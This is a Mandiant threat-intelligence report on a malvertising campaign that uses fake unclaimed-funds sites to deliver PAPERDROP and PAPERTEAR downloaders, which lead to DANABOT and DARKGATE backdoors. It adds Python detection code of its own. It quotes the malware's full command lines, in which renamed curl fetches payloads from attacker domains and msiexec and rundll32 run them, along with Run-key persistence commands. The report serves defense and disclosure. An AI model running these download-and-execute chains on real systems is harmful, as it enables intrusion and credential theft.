Opening a Can of Whoop Ads: Detecting and Disrupting a Malvertising Campaign Distributing Backdoors (Mandiant)

Earlier this year, Mandiant's Managed Defense threat hunting team identified an UNC2975 malicious advertising ("malvertising") campaign presented to users in sponsored search engine results and social media posts, consistent with activity reported in "From DarkGate to DanaBot". This campaign dates back to at least June 19, 2023, and has abused search engine traffic and leveraged malicious advertisements to affect multiple organizations, which resulted in the delivery of the DANABOT and DARKGATE backdoors.

Managed Defense worked with Advanced Practices and with the Google Anti-Malvertising team to remove the malicious advertisements from the ads ecosystem, and subsequently alerted other impacted organizations to also take action against this campaign.

This blog post covers the details of recently discovered infrastructure, operated by the distribution threat cluster UNC2975 (which Mandiant has tracked since 2021), that leveraged malicious advertisements to trick users into visiting fake unclaimed-funds-themed websites. In this UNC2975 campaign, the malicious websites delivered PAPERDROP and PAPERTEAR downloader
malware that eventually led to DANABOT and DARKGATE backdoor malware. This blog post also highlights how Mandiant's findings resulted in takedowns of malicious ad campaigns served on Google infrastructure.

Mandiant currently tracks around 30 threat clusters that use malicious advertisements for the delivery of malware, including backdoors, data stealers and downloaders. Since at least 2021, a threat actor tracked as UNC2975 has leveraged this technique to distribute downloader malware for second-stage payloads on victim endpoints.

UNC2975 is a distribution threat cluster that has historically used malvertising to distribute the VBScript-based downloader tracked as PAPERDROP. The distribution of PAPERDROP from UNC2975's fake websites has primarily led to the deployment of the Delphi-based backdoor DANABOT. DANABOT is part of a Malware-as-a-Service platform where multiple affiliates can purchase access to the service. Beginning in September 2023, UNC2975's malware distribution shifted: instead of DANABOT, UNC2975 deployed a Delphi-based backdoor tracked as part of the DARKGATE Malware-as-a-Service platform. Because multiple affiliates use these service platforms, the distribution methods of DANABOT and DARKGATE may vary across different distribution actors.

UNC2975 creates fake websites that leverage themes such as unclaimed money, family ancestry and astrology/horoscopes to facilitate its distribution operations. The threat cluster has commonly used social media advertisements to promote the fake websites, but has since expanded to additional platforms such as Microsoft and Google advertising.

Upon being notified of this campaign by Mandiant Managed Defense, the Google Anti-Malvertising team took enforcement actions and pivoted on the advertisement metadata to find additional related entries and to improve abuse detection and classification systems.

Adversaries use several sophisticated techniques, including impersonating genuine businesses, cloaking (i.e., hiding malicious web
pages that only get revealed under specific conditions) and redirection to circumvent Google Ads verification and defense mechanisms.

To protect users, Google detects, prevents and blocks abusive activity, as detailed in our annual Ads Safety report. Google encourages users to report suspicious advertisements they come across through either the My Ad Center reporting functionality or using this form.

Mandiant observed the following malware families while investigating this campaign:

PAPERDROP: PAPERDROP is a downloader written in Visual Basic Script that communicates via HTTPS. It has been observed downloading DANABOT by writing it to disk and then executing it.

PAPERTEAR: PAPERTEAR is a downloader written in Visual Basic Script that communicates via HTTP. PAPERTEAR appends a list of enumerated local processes in the initial HTTP request.

DANABOT: DANABOT is a backdoor written in Delphi that communicates using a custom binary protocol over TCP. The backdoor implements a plugin framework that allows it to add capabilities via downloaded plugins. DANABOT's capabilities include full system control using a VNC or RDP plugin, video and screenshot capture, keylogging, arbitrary shell command execution and file transfer. DANABOT's proxy plugin allows it to redirect or manipulate network traffic associated with targeted websites; this capability is often used to capture credentials or payment data. DANABOT can also extract stored credentials associated with web browsers and FTP clients. Numerous observed campaigns leveraging DANABOT have been reported, including UNC3379 activity associated with a coinminer campaign and a similar mechanism for DANABOT distribution using a different JS library.

DARKGATE: DARKGATE is a Delphi-based backdoor capable of performing keyboard capture, shell command execution, file transfer and execution, and credential theft. Other functions include system survey, shutdown and restart, taking screengrabs and controlling a cryptominer. Some
variants retrieve their command-and-control (C2, or C&C) address from a page on the pastebin.com website. More notable instances of OSINT reporting involving DARKGATE include actors previously associated with QAKBOT leveraging DARKGATE as a payload, and some insights into DARKGATE's technical architecture and use.

Threat actors purchase advertisements (MITRE ATT&CK technique T1583.008) for malicious websites with the goal of tricking users into visiting and downloading malware (T1189), which can lead to data theft and ransomware. Platforms that serve advertisements, such as search engines or social media, can provide granular controls that allow advertisers to target specific audiences based on users' geographic locations, IP address range (e.g., geofencing), browsing history and device types. Some of the more robust advertising platforms, such as Bing and Google Ads, provide even more targeting categories, like age, gender, income level and other audience attributes. These capabilities allow advertisers, both legitimate and malicious, to craft ads specific to their desired targets and improve the effectiveness of their campaigns. This also allows malicious advertisers who are able to avoid policy enforcement to develop and retain customer profiles about the victims who interact with their ads, for use in future targeting operations.

Earlier this year, Managed Defense's threat hunting team identified UNC2975 advertisements presented to users in sponsored search engine results and social media posts. The advertised websites were displayed in the sponsored results for searches related to unclaimed money, where individuals can search for and claim funds that are held by federal or state government agencies (T1583.008).

When an unsuspecting victim clicked on a malicious advertised result, they were presented with a web portal that prompted them to enter their first and last name and their state of residence in order to receive a report on purported unclaimed funds.

In each investigation under this campaign,
Mandiant identified browser history artifacts on affected systems showing that a user clicked on a malicious advertisement and interacted with one of two websites: claimprocessing.org or treasurydept.org.

Table: Browser history artifacts by advertisement placement. Social Media Post: Malicious URL, Page Title, Visit From, Visit Type. Sponsored Search Engine Result: Search URL, Malicious URL, Page Title, Visit From, Visit Type.

The downloadable reports were actually ZIP archive files containing Visual Basic scripts that Mandiant identified as variants of the downloader malware families PAPERDROP and PAPERTEAR. The ZIP archive and Visual Basic script filenames were based on the values the user submitted into the web form. Launching the Visual Basic script from an archive file generates a process execution event that launches the script from a temporary folder path (T1059.005). The temporary folder path that is created depends on the archiving utility, such as WinRAR, that is used to unpack the archive file.

Table: Events. Malicious ZIP File Download: File Write Processes, Sample Download URLs, Sample Destination Paths. PAPERDROP / PAPERTEAR Execution: Parent Process, Process, Sample Command Line.

Mandiant identified three different delivery chains that PAPERDROP and PAPERTEAR used to download and execute secondary payloads (DANABOT and DARKGATE malware attributed to multiple UNC groups). Two delivery chains leveraged a renamed version of the cURL binary, curl.exe (T1105), to download a malicious installation package (.msi) file (T1218.007) or an AutoIt executable (AutoIt3.exe) and malicious AutoIt script (.au3) file (T1059). Mandiant also observed PAPERDROP download and execute a malicious installation package file without using a specific transfer tool.

Table: Payload Delivery Chains (each chain is recorded as Parent Process, Process and Command Lines). Delivery Chain 1: Renamed cURL downloading Windows Installer Package and executing with Msiexec.exe. Delivery Chain 2:
Renamed cURL downloading AutoIt executable and script file. Delivery Chain 3: Windows Script Host process downloading Windows Installer Package and executing with Msiexec.exe.

The subsequent system artifacts that were created varied depending on the backdoor payload that was delivered. The post-delivery infection timelines shown in the following sections may not represent all potential artifacts, as complete malware execution may have been disrupted by endpoint security software or network controls.

In the first infection chain, following PAPERDROP execution, the Windows Script Host process (wscript.exe) performed a DNS request for the domain mesahalibut.sbs and connected to the IP address 47.252.45.173 over port 443. The process wscript.exe then executed the Windows Installer utility msiexec.exe (T1218.007) with the command msiexec /i C:\programData\HLWOIRTAA9P.bin /qn to quietly install an application using the package file C:\programData\HLWOIRTAA9P.bin, which masqueraded as a .bin file (T1036.008). Next, the Msiexec application launched the installer process C:\Windows\Installer\MSI4F8C.tmp, which executed the rundll32.exe command C:\WINDOWS\system32\rundll32.exe C:\Users\<user>\AppData\Local\Temp\Oadsoophotfp.dll,start to load the in-memory dropper DLL file C:\Users\<user>\AppData\Local\Temp\Oadsoophotfp.dll and execute a function named "start" to decompress and deobfuscate a DANABOT payload (T1218.011). The rundll32.exe process performed a series of writes to extensionless files under the user's AppData\Local\Temp directory.

The infected rundll32.exe process communicated with the IP address 35.203.111.228 over port 443 and the local IP address 127.0.0.1 over ports 22405 and 52787. The DANABOT malware launched the command C:\WINDOWS\system32\rundll32.exe C:\WINDOWS\system32\shell32.dll,#61 22405 to open and interact with the Run dialog that is normally accessed through the Start Menu. Lastly, the infected rundll32.exe process executed the commands schtasks /End /tn
\Microsoft\Windows\Wininet\CacheTask and schtasks /Run /tn \Microsoft\Windows\Wininet\CacheTask to stop and start the Wininet Cache Task (T1053.005). This Scheduled Task activity may be related to Wininet API hooking to intercept credentials entered into Microsoft Edge or Internet Explorer. Finally, the DANABOT-infected rundll32.exe process created and wrote to a randomly named .tmp file, such as C:\Users\<user>\AppData\Local\Temp\tmpAEA8.tmp or C:\Users\<user>\AppData\Local\Temp\Aroeihiaietwq.tmp.

Although not observed in each case, Mandiant identified Run key persistence to execute the DANABOT payload in the file C:\Users\<user>\AppData\Local\Temp\Oadsoophotfp.dll using a random key value, HKEY_USERS\<user>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\Hryrqsf (T1547.001).

In the second infection chain, the PAPERTEAR downloader performed an HTTP POST request to the host infocatalog.pics over port 8080. Next, the wscript.exe process executed the Windows Command Shell using an extended one-liner consisting of multiple commands, shown in Figure 5.

Command Line (Figure 5):

    C:\Windows\System32\cmd.exe /c mkdir c:\yifr & cd /d c:\yifr & copy c:\windows\system32\curl.exe yifr.exe & yifr -H "User-Agent: curl" -o Autoit3.exe http://infocatalog.pics:8080 & yifr -o khscrk.au3 http://infocatalog.pics:8080/msiyifrmouv & Autoit3.exe khscrk.au3

In the third infection chain, the PAPERDROP downloader executed another extended one-liner that used a renamed curl.exe binary (T1105) to download and install a malicious package file that drops DANABOT (T1218.007).

Command Line:

    C:\Windows\System32\cmd.exe /c cd /d C:\Users\USERNAME\AppData\Local\Temp & copy c:\windows\system32\curl.exe ihcbzhY.exe & ihcbzhY.exe -o SYUxEbPz.msi https://durhamsoulcarelife.org/n3sqd95xk20z2b3vue9tnpiadp2j6 & C:\Windows\System32\msiexec.exe /i SYUxEbPz.msi /qn

Following the execution of the SYUxEbPz.msi package installation, the msiexec.exe process created files to spoof the appearance of the Cisco Umbrella Roaming application under the directory C:\Users\<user>\AppData\Roaming\Cisco Corp\Umbrella Roaming Client\Umbrella Roaming Client. One file in
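As an added example (not code from the original post), the following Python breaks either of the two one-liners above into its chained steps and pulls out what a responder records from them: the name curl.exe was copied to, each download's URL, output file and User-Agent, and the final execution step (msiexec or AutoIt3). The two command lines are the ones quoted above with the domains defanged; the parsing heuristics, the report layout and the mapping of findings onto the ATT&CK techniques named in this post are this example's own assumptions.

```python
import re

# Constructed from the two command lines quoted in the post, domains defanged with [.].
CHAIN_DARKGATE = (
    r"C:\Windows\System32\cmd.exe /c mkdir c:\yifr & cd /d c:\yifr & "
    r"copy c:\windows\system32\curl.exe yifr.exe & "
    r'yifr -H "User-Agent: curl" -o Autoit3.exe http://infocatalog[.]pics:8080 & '
    r"yifr -o khscrk.au3 http://infocatalog[.]pics:8080/msiyifrmouv & "
    r"Autoit3.exe khscrk.au3"
)
CHAIN_DANABOT = (
    r"C:\Windows\System32\cmd.exe /c cd /d C:\Users\USERNAME\AppData\Local\Temp & "
    r"copy c:\windows\system32\curl.exe ihcbzhY.exe & "
    r"ihcbzhY.exe -o SYUxEbPz.msi https://durhamsoulcarelife[.]org/n3sqd95xk20z2b3vue9tnpiadp2j6 & "
    r"C:\Windows\System32\msiexec.exe /i SYUxEbPz.msi /qn"
)

TOKEN = re.compile(r'"[^"]*"|\S+')   # keeps a quoted argument such as "User-Agent: curl" whole


def split_chain(cmdline):
    """Drop the 'cmd.exe /c' prefix and split the body on the & / && separators."""
    m = re.match(r'^"?[^"]*?cmd(?:\.exe)?"?\s+/[cC]\s+(.*)$', cmdline, re.S)
    body = m.group(1) if m else cmdline
    return [s.strip() for s in re.split(r"\s*&&?\s*", body) if s.strip()]


def basename(path):
    """Final path component, quotes removed (assumed helper)."""
    return path.strip('"').replace("/", "\\").rsplit("\\", 1)[-1]


def analyze_chain(cmdline):
    """Walk the steps in order, remembering which new name curl.exe was copied to."""
    renamed = set()
    report = {"workdir": None, "renamed_curl": None, "downloads": [], "executes": []}
    for step in split_chain(cmdline):
        toks = TOKEN.findall(step)
        verb = basename(toks[0]).lower()
        if verb == "cd":
            report["workdir"] = toks[-1]
        elif verb == "copy" and len(toks) == 3 and basename(toks[1]).lower() == "curl.exe":
            report["renamed_curl"] = basename(toks[2])
            renamed.add(basename(toks[2]).lower().removesuffix(".exe"))
        elif verb.removesuffix(".exe") in renamed:
            # A step invoked through the copied cURL name: collect -o, -H User-Agent and the URL.
            dl = {"url": None, "out": None, "user_agent": None}
            for i, t in enumerate(toks):
                if t == "-o" and i + 1 < len(toks):
                    dl["out"] = toks[i + 1]
                elif t == "-H" and i + 1 < len(toks) and toks[i + 1].strip('"').lower().startswith("user-agent:"):
                    dl["user_agent"] = toks[i + 1].strip('"').split(":", 1)[1].strip()
                elif t.strip('"').lower().startswith(("http://", "https://")):
                    dl["url"] = t.strip('"')
            report["downloads"].append(dl)
        elif verb.removesuffix(".exe") == "msiexec" and "/i" in [t.lower() for t in toks]:
            i = [t.lower() for t in toks].index("/i")
            report["executes"].append({"via": "msiexec /i", "target": toks[i + 1], "quiet": "/qn" in toks})
        elif verb.removesuffix(".exe") == "autoit3" and len(toks) > 1:
            report["executes"].append({"via": "AutoIt3.exe", "target": toks[1]})
    return report


def flag_chain(report):
    """Map the parsed steps onto the detection opportunities the post lists (assumed mapping)."""
    flags = []
    if report["renamed_curl"]:
        flags.append(("cURL binary copied via command line", "T1036.003"))
    for d in report["downloads"]:
        if d["user_agent"] == "curl":
            flags.append(("renamed cURL sending the default 'curl' User-Agent", "T1105 T1036.003"))
        if (d["out"] or "").lower().endswith(".au3"):
            flags.append(("AutoIt script file payload downloaded via command line", "T1105"))
        if (d["out"] or "").lower().endswith(".msi"):
            flags.append(("masquerading cURL downloading MSI file", "T1105 T1036.003"))
    for e in report["executes"]:
        if e["via"] == "msiexec /i" and e["quiet"]:
            flags.append(("quiet msiexec install of a downloaded package", "T1218.007"))
        elif e["via"] == "AutoIt3.exe":
            flags.append(("AutoIt3.exe executing a downloaded script", "T1059"))
    return flags


if __name__ == "__main__":
    for chain in (CHAIN_DARKGATE, CHAIN_DANABOT):
        r = analyze_chain(chain)
        print(r)
        for name, tech in flag_chain(r):
            print("  ", tech, name)
```

The parser deliberately keys off the copy step rather than the string "curl": once curl.exe has been copied to yifr.exe, the later "yifr -o ..." step is recognised as a cURL download even though neither the image name nor the command line contains "curl".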
the new directory, CoreReborn32.bin, was identified as a DANABOT launcher. In a separate investigation, Mandiant identified a folder path that spoofed the Box Edit application and dropped a DANABOT payload to the path C:\Users\<user>\AppData\Roaming\Box Inc\Box Edit\Box Edit\BoxLocalComServerFixEnvironment.dll.

Next, the Windows Installer process C:\Windows\Installer\MSI23C9.tmp launched the DANABOT backdoor with the Rundll32 command rundll32.exe "C:\Users\<user>\AppData\Roaming\Cisco Corp\Umbrella Roaming Client\Umbrella Roaming Client\CoreReborn32.bin",start (T1218.011). Once executed, the DANABOT-infected rundll32.exe process wrote to the Windows Run key HKEY_USERS\<user>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Srfshu to ensure persistent execution of the command C:\WINDOWS\system32\RUNDLL32.EXE "C:\Users\<user>\AppData\Roaming\Cisco Corp\Umbrella Roaming Client\Umbrella Roaming Client\CoreReborn32.bin",start (T1547.001). In addition to Run key persistence, Mandiant has also identified the capability for DANABOT to use a new Windows service (T1543.003), using the ServiceDll entry to point to the malicious DLL.

Similar to the first infection chain, the infected rundll32.exe performed a series of writes to extensionless files under the user's AppData\Local\Temp directory, and communicated with the IP address 34.16.18.10 over port 443 and the local IP address 127.0.0.1 over port 15066. The DANABOT malware launched the command C:\WINDOWS\system32\rundll32.exe C:\WINDOWS\system32\shell32.dll,#61 15066 to open and interact with the Run dialog, and executed the commands schtasks /End /tn \Microsoft\Windows\Wininet\CacheTask and schtasks /Run /tn \Microsoft\Windows\Wininet\CacheTask to stop and start the Wininet Cache Task (T1053.005). The DANABOT payload also modified the local proxy settings in the Windows registry (T1562).

Finally, the DANABOT-infected rundll32.exe process wrote to a randomly named .tmp file, C:\Users\<user>\AppData\Local\Temp\Prfpdh.tmp.

Throughout the course of the observed malvertising campaign, Mandiant encountered both PAPERDROP and PAPERTEAR Visual Basic Script (VBS) files in use
by malicious actors to facilitate payload deployment.

The main difference in functionality between PAPERDROP and PAPERTEAR is that PAPERDROP makes heavier use of local files to facilitate payload deployment, whereas PAPERTEAR leverages direct command line execution.

Initially observed by Mandiant in January 2021 in use by UNC2975, PAPERDROP is primarily associated with DANABOT payload distribution and generally has several distinct characteristics across two different build types. NOTE: Since 2021, PAPERDROP has been observed in use by multiple UNC groups. The samples shown in this section represent a cross-section of the PAPERDROP malware family as a whole and are not specific to UNC2975 activity.

The first build type is markedly denser than the second. It features prominent use of code comments, complex variable names and other junk code, presumably used as a rudimentary code obfuscation mechanism (T1027).

In addition to the more commonly observed mechanism for code comments leveraging single quotes, Visual Basic also allows the use of the characters REM to designate code comments. This can be seen in Figure 10.

Looking through the smokescreened code reveals some interesting elements. PAPERDROP seemingly leverages basic mathematical operations, especially modulus (Mod), as part of its execution flow.

It also does little in the way of obfuscation with regard to concealing its C2 addresses or file system path names. It merely separates these values through individual function calls that add characters to progressively concatenated strings, but it is possible to view the characters by simply scrolling through the file and reading them in reverse order, from bottom to top (see Figure 11).

Some samples of PAPERDROP build type 1 feature elaborate Sleep calls, presumably in an attempt to evade sandbox detection.

Conversely, PAPERDROP build type 2 is much closer to PAPERTEAR in its architecture. It makes limited use of smokescreened/obfuscated code in comparison to build type 1, though it still
makes use of mathematical functions as part of its execution flow.

When fully deobfuscated, the core download functionality executes as shown in Figure 14.

In the case of Figure 14, the file payload from ignitethefund.com was saved to C:\ProgramData\1DR.png, though it was executed by the PAPERDROP VBS as a DLL.

Similar to PAPERDROP build type 2, PAPERTEAR is also comparatively less dense. It too avoids excessive use of junk code and stays fairly direct in terms of its execution flow. When executed on a host, most variants of PAPERTEAR try to collect a list of running processes via Windows Management Instrumentation (T1047).

PAPERTEAR will then initiate an attempt to retrieve its payload via an HTTP POST request to a remote C2 server through a WinHTTPRequest object and, for certain variants, appends the list of running processes it retrieves (code shown in Figure 16) to the outbound HTTP request header. One of the minor obfuscation methods leveraged by PAPERTEAR samples is the sporadic inclusion of curious code comments (Figure 16), presumably to avoid static-based detections and amplify code entropy. In this case, however, identifying the literary source of the comments was quite elementary.

From there, PAPERTEAR will parse the HTTP response from the C2 server and directly execute its contents on the host via ShellExecute. With the limited obfuscation removed, the crucial snippet of code from Figure 16 that performs this function would otherwise appear as:

This is the core differentiator between PAPERTEAR and PAPERDROP: while PAPERTEAR executes commands directly from the HTTP response it receives, PAPERDROP writes the contents of the HTTP response to disk prior to executing additional steps in its infection chain. PAPERTEAR is primarily associated with the distribution of DARKGATE payloads and is suspected to be integrated directly into the DARKGATE malware build process.

Mandiant has been disseminating intelligence on UNC2975's campaign within Mandiant Advantage, providing our customers with
notable and dynamic updates regarding changes in tactics and techniques, the introduction of tools with new capabilities, and the new infrastructure UNC2975 has used to carry out its mission.

Mandiant tracks separate campaigns for each distribution method or actor delivering the Malware-as-a-Service backdoor DARKGATE. To differentiate between the initial malware distribution, the DARKGATE infrastructure and follow-on activity, Mandiant tracks each part of the intrusion as a separate cluster until further overlaps are identified and warrant merging. Mandiant tracks the DARKGATE Malware-as-a-Service infrastructure and associated payloads as UNC5085, while separately clustering the different distribution methods and any follow-on actors.

See our previous blog post for more insights into how Mandiant can help: Gain Visibility Into Attacker Activity with Threat Campaigns. The following campaigns within Mandiant Advantage are associated with recent DARKGATE distribution actors and follow-on activity:

Campaign Number | Campaign | Actors
CAMP.23.045 | Suspected Financially Motivated Actor Phishing Employees via LinkedIn to Distribute DARKGATE Backdoor | UNC4962 (Distribution); UNC5085 (DARKGATE)
CAMP.23.046 | Financially Motivated Threat Actor Using Social Media and SEO Poisoning to Compromise User with PAPERDROP and DANABOT | UNC2975 (Distribution); UNC5085 (DARKGATE)
CAMP.23.050 | Financially Motivated Actor Distributing DARKGATE via Microsoft Teams | UNC5051 (Distribution); UNC5085 (DARKGATE)
CAMP.23.051 | Distribution Cluster UNC2500 Emerges After Hiatus to Distribute Various Payloads Downloaded from Links in Phishing Emails | UNC2500 (Distribution); UNC5085 (DARKGATE)
CAMP.23.053 | Financially Motivated Threat Actor Leveraging DARKGATE Access to Deploy BASTA Ransomware | UNC2500 (Distribution); UNC4393 (Follow-on)

In M-Trends 2023, the three most common initial access techniques Mandiant observed related to workstation compromise were phishing (T1566), drive-by compromise (T1189) and replication through removable media
(T1091). Within the category of drive-by compromise, Mandiant has observed an increase from 2022 to 2023 in the number of investigations involving malicious advertisements where the initial infection vector could be identified. More broadly, in 2022 alone Google removed over 5.2 billion ads, restricted over 4.3 billion ads and suspended over 6.7 million advertiser accounts. While it is unlikely that malvertising will cease to be a viable attack vector for threat actors, maintaining a level of response readiness when such threats are identified is key to being able to neutralize campaigns in their early stages. In this case, Mandiant Managed Defense, in partnership with Mandiant Intelligence and the Google Ads team, was able to protect users on a granular, host-based level as well as at a global scale across the Google ecosystem.

Mandiant's Managed Defense threat hunting team focuses on identifying behaviors associated with threat actors and endpoint compromises, especially those that don't typically generate product-based alerts. By focusing on behavioral indicators, we can identify evidence of different types of compromise, such as malware execution or a threat actor profiling an environment using discovery commands. Like all security analysts, when we identify evidence of compromise we analyze the data to try to answer the question: "How was the system initially compromised?" Performing a deeper dive to identify the initial infection vector and related timeline events provides two benefits: (1) the ability to identify campaigns through repeated use of infrastructure and indicators, and (2) additional malware or behavioral artifacts that can be used to create or expand existing detections, event correlations and threat hunting missions. The Detection Opportunities section of this blog post includes commands and artifacts that Mandiant discovered beyond the initial detection events, which were used to create additional signatures to identify future activity faster.

Security analysts can
use the following events as input for testing new or existing signatures for context-based detection or alerting.

Detection Opportunities

Detection Opportunity | MITRE ATT&CK Techniques | Event Details (fields recorded)
Msiexec installing package with masquerading file extension | T1218.007, T1036.008 | Parent Process; Process; Command Line
Rundll32 opening the Run Dialog via shell32.dll | T1218.011 | Parent Process; Process; Command Line
Anomalous Rundll32 file writes to Temp directory | T1218.011 | Process; Files Written
Windows Script Host executing file in compressed archive | T1059.005, T1204.002 | Parent Process; Process; Command Line
Msiexec installing package located under ProgramData | T1218.007 | Parent Process; Process; Command Line
AutoIt script file payload downloaded via command line | T1105 | Parent Process; Process; Command Line
cURL binary copied via command line | T1036.003 | Parent Process; Process; Command Line
Suspected renamed cURL binary execution | T1105, T1036.003 | Parent Process; Process; Command Line; User-Agent
Masquerading cURL downloading MSI file | T1105, T1036.003 | Parent Process; Process; Command Line
Schtasks used to stop WININET Cache Task | T1053.005 | Parent Process; Process; Command Line
Schtasks used to start WININET Cache Task | T1053.005 | Parent Process; Process; Command Line
Rundll32 loading DLL file with anomalous extension | T1218.011, T1036.008 | Process; Command Line; Image Load
Rundll32 modifying local proxy settings | T1218.011, T1562 | Process; Registry Keys
Registry Run key with Rundll32 command in text value | T1547.001, T1218.011 | Registry Key; Text Value
Rundll32 process creating Run key persistence | T1547.001, T1218.011 | Process; Registry Key; Text Value
Rundll32 execution of file under AppData | T1218.011 | Parent Process; Process; Command Line
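As an added example (not Mandiant's detection content), the detection opportunities above are encoded as predicates over a constructed stream of endpoint events and run in one pass, including a benign msiexec install that must not fire. The event schema (process, file_write and registry dicts), the archive temp-folder patterns, the SID, the .vbs file name and the benign package name in the sample events are this example's own assumptions; the remaining command lines, paths and registry key mirror the artifacts described earlier in the post, with the domain defanged.

```python
import re


def base(path):
    """Case-folded final path component of an image or file path."""
    return path.strip('"').rsplit("\\", 1)[-1].lower()


def msi_target(cmd):
    """Package path handed to msiexec /i, or None when /i is absent."""
    m = re.search(r'(?i)(?:^|\s)/i\s+"?([^"\s]+)', cmd)
    return m.group(1) if m else None


def rundll32_module(cmd):
    """File passed to rundll32.exe (quoted or not), without the ,entrypoint suffix."""
    m = re.search(r'rundll32\.exe"?\s+(?:"([^"]+)"|([^\s,]+))', cmd, re.I)
    return (m.group(1) or m.group(2)) if m else None


# Assumed extraction folders: WinRAR (Rar$...), 7-Zip (7z...), Explorer (Temp1_...)
TEMP_ARCHIVE = re.compile(r"\\Temp\\(Rar\$|7z|Temp1_)", re.I)
CACHETASK = re.compile(r'/(End|Run)\s+/tn\s+"?\\?Microsoft\\Windows\\Wininet\\CacheTask', re.I)
RUN_KEY = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run\\", re.I)


def masquerading_msi(e):
    t = msi_target(e["cmdline"])
    return base(e["image"]) == "msiexec.exe" and t is not None and not t.lower().endswith(".msi")

def msi_from_programdata(e):
    t = msi_target(e["cmdline"])
    return base(e["image"]) == "msiexec.exe" and t is not None and "\\programdata\\" in t.lower()

def run_dialog(e):   # shell32.dll ordinal 61 is the Run dialog
    return base(e["image"]) == "rundll32.exe" and bool(re.search(r"shell32\.dll,#?61\b", e["cmdline"], re.I))

def rundll32_anomalous_ext(e):
    mod = rundll32_module(e["cmdline"])
    return base(e["image"]) == "rundll32.exe" and mod is not None and not mod.lower().endswith(".dll")

def rundll32_appdata(e):
    return base(e["image"]) == "rundll32.exe" and "\\appdata\\" in e["cmdline"].lower()

def wsh_from_archive(e):
    return base(e["image"]) in ("wscript.exe", "cscript.exe") and bool(TEMP_ARCHIVE.search(e["cmdline"]))

def renamed_curl(e):
    # curl-style "-o <file> <url>" from an image that is not curl.exe, or curl's default User-Agent
    c = e["cmdline"]
    curlish = bool(re.search(r"\s-o\s+\S+", c)) and bool(re.search(r"https?://", c, re.I))
    return base(e["image"]) != "curl.exe" and (curlish or "user-agent: curl" in c.lower())

def cachetask_schtasks(e):
    return base(e["image"]) == "schtasks.exe" and bool(CACHETASK.search(e["cmdline"]))

def rundll32_temp_writes(e):   # extensionless files under AppData\Local\Temp
    p = e["path"]
    return base(e["image"]) == "rundll32.exe" and "\\appdata\\local\\temp\\" in p.lower() and "." not in base(p)

def run_key_rundll32(e):
    return bool(RUN_KEY.search(e["key"])) and "rundll32" in e["value"].lower()


RULES = [  # (detection opportunity, techniques, event type, predicate)
    ("Msiexec installing package with masquerading file extension", "T1218.007 T1036.008", "process", masquerading_msi),
    ("Msiexec installing package located under ProgramData", "T1218.007", "process", msi_from_programdata),
    ("Rundll32 opening the Run Dialog via shell32.dll", "T1218.011", "process", run_dialog),
    ("Rundll32 loading DLL file with anomalous extension", "T1218.011 T1036.008", "process", rundll32_anomalous_ext),
    ("Rundll32 execution of file under AppData", "T1218.011", "process", rundll32_appdata),
    ("Windows Script Host executing file in compressed archive", "T1059.005 T1204.002", "process", wsh_from_archive),
    ("Suspected renamed cURL binary execution", "T1105 T1036.003", "process", renamed_curl),
    ("Schtasks used to stop or start WININET Cache Task", "T1053.005", "process", cachetask_schtasks),
    ("Anomalous Rundll32 file writes to Temp directory", "T1218.011", "file_write", rundll32_temp_writes),
    ("Registry Run key with Rundll32 command in text value", "T1547.001 T1218.011", "registry", run_key_rundll32),
]


def hunt(events):
    """Return one hit per (event, rule) pair that matched."""
    return [{"event": i, "rule": name, "techniques": tech}
            for i, e in enumerate(events)
            for name, tech, etype, pred in RULES if e["type"] == etype and pred(e)]


# Constructed telemetry (Sysmon-like), modelled on the artifacts described in the post.
EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'"C:\Windows\System32\wscript.exe" "C:\Users\user\AppData\Local\Temp\Rar$DIa0.123\John_Smith_Report.vbs"'},
    {"type": "process", "image": r"C:\Windows\System32\msiexec.exe", "cmdline": r"msiexec /i C:\programData\HLWOIRTAA9P.bin /qn"},
    {"type": "process", "image": r"C:\WINDOWS\system32\rundll32.exe",
     "cmdline": r"C:\WINDOWS\system32\rundll32.exe C:\Users\user\AppData\Local\Temp\Oadsoophotfp.dll,start"},
    {"type": "process", "image": r"C:\WINDOWS\system32\rundll32.exe",
     "cmdline": r"C:\WINDOWS\system32\rundll32.exe C:\WINDOWS\system32\shell32.dll,#61 22405"},
    {"type": "process", "image": r"C:\Windows\System32\schtasks.exe", "cmdline": r'schtasks /End /tn "\Microsoft\Windows\Wininet\CacheTask"'},
    {"type": "process", "image": r"C:\yifr\yifr.exe", "cmdline": r'yifr -H "User-Agent: curl" -o Autoit3.exe http://infocatalog[.]pics:8080'},
    {"type": "process", "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r'rundll32.exe "C:\Users\user\AppData\Roaming\Cisco Corp\Umbrella Roaming Client\Umbrella Roaming Client\CoreReborn32.bin",start'},
    {"type": "file_write", "image": r"C:\WINDOWS\system32\rundll32.exe", "path": r"C:\Users\user\AppData\Local\Temp\Aroeihiaietwq"},
    {"type": "registry", "key": r"HKEY_USERS\S-1-5-21-1111111111-2222222222-3333333333-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Srfshu",
     "value": r'C:\WINDOWS\system32\RUNDLL32.EXE "C:\Users\user\AppData\Roaming\Cisco Corp\Umbrella Roaming Client\Umbrella Roaming Client\CoreReborn32.bin",start'},
    {"type": "process", "image": r"C:\Windows\System32\msiexec.exe", "cmdline": r'msiexec /i "C:\Users\user\Downloads\setup.msi" /qn'},  # benign control
]

if __name__ == "__main__":
    for h in hunt(EVENTS):
        print(h["event"], h["techniques"], h["rule"])
```

Each predicate checks the image name together with the command-line shape, so the benign quiet install of a .msi package from Downloads produces no hit while the .bin package under ProgramData fires two rules; the rundll32 rules key on the module's extension and location rather than on the entry point name, which the operators choose freely.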
